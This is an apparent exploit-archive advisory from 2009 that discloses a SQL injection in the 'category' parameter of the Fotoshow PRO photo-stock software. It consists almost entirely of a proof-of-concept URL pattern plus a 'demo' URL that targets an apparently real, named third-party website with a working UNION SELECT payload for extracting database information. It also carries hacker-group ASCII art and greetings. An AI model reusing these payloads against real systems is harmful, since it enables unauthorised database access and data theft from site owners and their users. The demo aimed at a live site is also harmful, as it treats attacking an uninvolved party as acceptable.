[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Fotoshow PRO (category) Remote SQL Injection Vulnerability
# Published : 2009-08-18
# Author : darkmasking
# Previous Title : Joomla Component MisterEstate Blind SQL Injection Exploit
# Next Title : phpfreeBB 1.0 Remote BLIND SQL Injection Vulnerability
[??]====================================================================================================================[_][-][X]
[??] [??]
[??] Fotoshow PROa?¢ (category) Remote SQL Injection Vulnerability [??]
[??] [??]
[??] ======= ------d-------m------ ==== ==== [??]
[??] || = | |(o o)| | || || || [??]
[??] || = ||(~)|| || || [??]
[??] ======= /| || || [??]
[??]==========================================================================================================================[??]
[??] Author : darkmasking [??]
[??] Date : August, 15th 2009 [??]
[??] Contact : darkmasking[at]gmail[dot]com [??]
[??] Critical Level : Dangerous (*RED) [??]
[??]--------------------------------------------------------------------------------------------------------------------------[??]
[??] Affected software description : [??]
[??] Software : Fotoshow PROa?¢ [??]
[??] Vendor : http://www.fotoshowpro.com/ [??]
[??] Price : $5,000 (USD) http://www.fotoshowpro.com/features.php _o/ [??]
[??]==========================================================================================================================[??]
[??] [??]
[??] [~] SQLi POC [??]
[??] [??]
[??] [+] http://www.target.com/[path]/results.php?category=[SQli]` [??]
[??] [??]
[??] [??]
[??]--------------------------------------------------------------------------------------------------------------------------[??]
[??] [??]
[??] [~] SQLi POC Demo [??]
[??] [??]
[??] [+] http://www.macduffeverton.com/stock/results.php?category=-9999 and 1=0 union select null,version(),null,null,null-- [??]
[??] [??]
[??]--------------------------------------------------------------------------------------------------------------------------[??]
[??] [??]
[??] [~] Greetz [??]
[??] [??]
[??] Sorry bro belum dapat teman, jadi untuk diri sendiri aja! (SELAMAT MERAYAKAN 17an | Semoga Meriah) [??]
[??] [??]
[??] [??]
[??]==========================================================================================================================[??]
# www.Syue.com [2009-08-18]